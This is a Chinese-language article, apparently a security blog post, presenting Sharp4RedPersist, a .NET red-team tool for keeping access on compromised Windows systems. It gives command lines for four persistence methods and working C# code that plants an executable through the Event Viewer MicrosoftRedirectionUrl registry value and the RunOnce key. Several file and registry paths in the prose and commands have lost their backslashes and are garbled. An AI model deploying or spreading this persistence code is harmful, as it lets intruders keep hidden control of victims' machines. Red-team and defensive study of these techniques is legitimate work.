.NET 一款支持8种方式维持权限的工具

阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他方面

基本介绍

Sharp4RedPersist是一款功能强大的持久化工具，专为在Windows环境中操作的红队设计。通过利用各种持久化机制，这款工具能够在被攻陷的系统上维持访问权限。Sharp4RedPersist支持八种或更多不同的方法，确保通过多个向量保持持久访问。

使用方法

Sharp4RedPersist支持以下持久化方法，每种方法都可以使用特定的命令行参数调用。

3.1 EventViewer

事件查看器：通过操纵事件查看器助手实现持久化。

Sharp4RedPersist.exe --eventviewer C:UsersUserexe.exe

3.2 Startup

启动项：通过将可执行文件添加到系统启动项来确保持久化

Sharp4RedPersist.exe --startup C:UsersUserexe.exe

3.3 Autologon

自动登录：利用自动登录功能实现持久化

Sharp4RedPersist.exe --autologon C:UsersUserexe.exe

3.4 Screensaver

屏幕保护程序：通过屏幕保护程序设置实现持久化。

Sharp4RedPersist.exe --screensaver C:UsersUserexe.exe

编码实现

Sharp4RedPersist工具主要通过修改Windows注册表来操作，Windows注册表是存储配置设置和选项的重要组件。以下是事件查看器和启动项方法的实现，展示了Sharp4RedPersist如何通过操纵注册表项实现持久化。

事件查看器方法在MicrosoftWindows NTCurrentVersionEvent Viewer下创建一个注册表项，并将重定向URL设置为指定的可执行文件：

public class Eventviewer1
{
    public static void Do(string[] args)
    {
        RegistryKey hklm = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64);
        RegistryKey key = hklm.OpenSubKey("SOFTWARE", true);
        key = key.CreateSubKey("Microsoft\Windows NT\CurrentVersion\Event Viewer");
        key.SetValue("MicrosoftRedirectionUrl", args[1], RegistryValueKind.String);
        key.Close();
        Console.WriteLine("[*] Eventviewer Persistence created");
    }
}

启动项方法在SOFTWAREMicrosoftWindowsCurrentVersionRunOnce下创建一个注册表项，确保可执行文件在启动时运行：

public class Startup1
{
    public static void Do(string[] args)
    {
        RegistryKey key = Registry.CurrentUser.CreateSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce");
        key.SetValue("detect", args[1]);
        key.Close();
        Console.WriteLine("[*] Startup Persistence created");
    }
}